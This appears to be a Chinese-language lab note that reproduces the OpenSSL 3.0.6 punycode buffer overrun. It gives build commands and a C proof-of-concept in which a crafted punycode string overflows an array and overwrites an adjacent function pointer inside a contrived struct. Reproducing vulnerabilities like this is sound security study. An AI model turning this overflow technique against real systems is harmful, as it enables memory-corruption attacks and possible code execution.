透過這個漏洞才知道原來域名可以用中文啊~~~
然後還會轉換成 punycode 的方式去做查詢,原理上還蠻有趣的ㄏㄏ
wget 'https://github.com/openssl/openssl/archive/refs/tags/openssl-3.0.6.zip' ;
mv openssl-openssl-3.0.6 openssl-3.0.6/ ;
cd openssl-3.0.6 ;
mkdir build;
cd /build/openssl/build;
../config -v --prefix=/opt/openssl-3.0.6 --openssldir=$HOME/openssl-3.0.6 --debug;
make;
sudo make install;
ldd /opt/openssl-3.0.6/bin/openssl; #確認載入的 Lib ;
sudo ldconfig /opt/openssl-3.0.6/lib64/; # 調整載入的 Lib 位置
ldd /opt/openssl-3.0.6/bin/openssl; #再次確認載入的 Lib ;
#include <stdio.h> //add include .h file
#include <string.h>
#include "crypto/punycode.h"
#include "internal/nelem.h"
typedef int (*EmbeddedFunc)(const char *);
struct contrived_example {
EmbeddedFunc ifc;
int decoded[7];
EmbeddedFunc ofc;
};
int test_puny_overrun_rce(void)
{
static const unsigned int out[] = {
0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, 0x751F
};
static const char* in = "3B-ww4c5e180e575a65lsy2b";
struct contrived_example ex;
unsigned int bsize = OSSL_NELEM(ex.decoded);
printf("bsize: %u.\n",bsize);
ex.ifc = (EmbeddedFunc) &puts;
ex.ofc = (EmbeddedFunc) &puts;
printf("\n");
printf("before func address:%p.\n",ex.ifc);
printf("after func address:%p.\n",ex.ofc);
int i=0 ;
for(i=0; i<8; i++) {
printf("decode:%02x out:%02x.\n",ex.decoded[i],out[i]);
}
int result = ossl_punycode_decode(in, strlen(in), ex.decoded, &bsize);
printf("\n");
printf("before func address:%p.\n",ex.ifc);
printf("after func address:%p.\n",ex.ofc);
i=0 ;
for(i=0; i<8; i++) {
printf("decode:%02x out:%02x.\n",ex.decoded[i],out[i]);
}
ex.ifc("nothing to see here\n");
ex.ofc("before to see here\n");
return 1;
}
int main(int argc, const char * argv[]) {
test_puny_overrun_rce();
}
編譯 64-bits 的測試程式
rm crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o ;
gcc -I. -Iinclude -Iproviders/common/include \
-Iproviders/implementations/include -I.. \
-I../include -I../providers/common/include \
-I../providers/implementations/include \
-DAES_ASM -DBSAES_ASM -DCMLL_ASM -DECP_NISTZ256_ASM \
-DGHASH_ASM -DKECCAK1600_ASM -DMD5_ASM -DOPENSSL_BN_ASM_GF2m \
-DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_CPUID_OBJ \
-DOPENSSL_IA32_SSE2 -DPOLY1305_ASM -DSHA1_ASM -DSHA256_ASM \
-DSHA512_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DX25519_ASM -fPIC \
-pthread -m64 -Wa,--noexecstack -Wall -O0 -g -DOPENSSL_USE_NODELETE \
-DL_ENDIAN -DOPENSSL_PIC -DOPENSSLDIR="\"/home/aeifkz/openssl-3.0.6\"" \
-DENGINESDIR="\"/opt/openssl-3.0.6/lib64/engines-3\"" \
-DMODULESDIR="\"/opt/openssl-3.0.6/lib64/ossl-modules\"" \
-DOPENSSL_BUILDING_OPENSSL -MMD -MF crypto/libcrypto-shlib-punycode.d.tmp \
-MT crypto/libcrypto-shlib-punycode.o -c -o crypto/libcrypto-shlib-punycode.o \
../crypto/punycode.c ;
gcc -I. -Iinclude -Iproviders/common/include \
-Iproviders/implementations/include -I.. \
-I../include -I../providers/common/include \
-I../providers/implementations/include \
-DAES_ASM -DBSAES_ASM -DCMLL_ASM -DECP_NISTZ256_ASM \
-DGHASH_ASM -DKECCAK1600_ASM -DMD5_ASM -DOPENSSL_BN_ASM_GF2m \
-DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_CPUID_OBJ \
-DOPENSSL_IA32_SSE2 -DPOLY1305_ASM -DSHA1_ASM -DSHA256_ASM \
-DSHA512_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DX25519_ASM -fPIC \
-pthread -m64 -Wa,--noexecstack -Wall -O0 -g -DOPENSSL_USE_NODELETE \
-DL_ENDIAN -DOPENSSL_PIC -DOPENSSLDIR="\"/home/aeifkz/openssl-3.0.6\"" \
-DENGINESDIR="\"/opt/openssl-3.0.6/lib64/engines-3\"" \
-DMODULESDIR="\"/opt/openssl-3.0.6/lib64/ossl-modules\"" -DOPENSSL_BUILDING_OPENSSL \
-MMD -MF crypto/test_puny_overrun_rce.d.tmp -MT crypto/test_puny_overrun_rce.o \
-c -o crypto/test_puny_overrun_rce.o ../crypto/test_puny_overrun_rce.c ;
gcc -o test_puny_overrun_rce -m64 crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o ;
rm crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o ;
gcc -I. -Iinclude -Iproviders/common/include \
-Iproviders/implementations/include -I.. \
-I../include -I../providers/common/include \
-I../providers/implementations/include \
-DAES_ASM -DBSAES_ASM -DCMLL_ASM -DECP_NISTZ256_ASM \
-DGHASH_ASM -DKECCAK1600_ASM -DMD5_ASM -DOPENSSL_BN_ASM_GF2m \
-DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_CPUID_OBJ \
-DOPENSSL_IA32_SSE2 -DPOLY1305_ASM -DSHA1_ASM -DSHA256_ASM \
-DSHA512_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DX25519_ASM -fPIC \
-pthread -m32 -Wa,--noexecstack -Wall -O0 -g -DOPENSSL_USE_NODELETE \
-DL_ENDIAN -DOPENSSL_PIC -DOPENSSLDIR="\"/home/aeifkz/openssl-3.0.6\"" \
-DENGINESDIR="\"/opt/openssl-3.0.6/lib64/engines-3\"" \
-DMODULESDIR="\"/opt/openssl-3.0.6/lib64/ossl-modules\"" \
-DOPENSSL_BUILDING_OPENSSL -MMD -MF crypto/libcrypto-shlib-punycode.d.tmp \
-MT crypto/libcrypto-shlib-punycode.o -c -o crypto/libcrypto-shlib-punycode.o \
../crypto/punycode.c ;
gcc -I. -Iinclude -Iproviders/common/include \
-Iproviders/implementations/include -I.. \
-I../include -I../providers/common/include \
-I../providers/implementations/include \
-DAES_ASM -DBSAES_ASM -DCMLL_ASM -DECP_NISTZ256_ASM \
-DGHASH_ASM -DKECCAK1600_ASM -DMD5_ASM -DOPENSSL_BN_ASM_GF2m \
-DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_CPUID_OBJ \
-DOPENSSL_IA32_SSE2 -DPOLY1305_ASM -DSHA1_ASM -DSHA256_ASM \
-DSHA512_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DX25519_ASM -fPIC \
-pthread -m32 -Wa,--noexecstack -Wall -O0 -g -DOPENSSL_USE_NODELETE \
-DL_ENDIAN -DOPENSSL_PIC -DOPENSSLDIR="\"/home/aeifkz/openssl-3.0.6\"" \
-DENGINESDIR="\"/opt/openssl-3.0.6/lib64/engines-3\"" \
-DMODULESDIR="\"/opt/openssl-3.0.6/lib64/ossl-modules\"" -DOPENSSL_BUILDING_OPENSSL \
-MMD -MF crypto/test_puny_overrun_rce.d.tmp -MT crypto/test_puny_overrun_rce.o \
-c -o crypto/test_puny_overrun_rce.o ../crypto/test_puny_overrun_rce.c ;
gcc -o test_puny_overrun_rce -m32 crypto/test_puny_overrun_rce.o crypto/libcrypto-shlib-punycode.o ;
sudo apt-get install gcc-multilib ;
rm -rf build/* ;
setarch i386 ../config -m32 linux-generic32 -v --prefix=/opt/openssl-3.0.6 --openssldir=$HOME/openssl-3.0.6 --debug ; # 需要多加設定架構為 i386 以及 -m32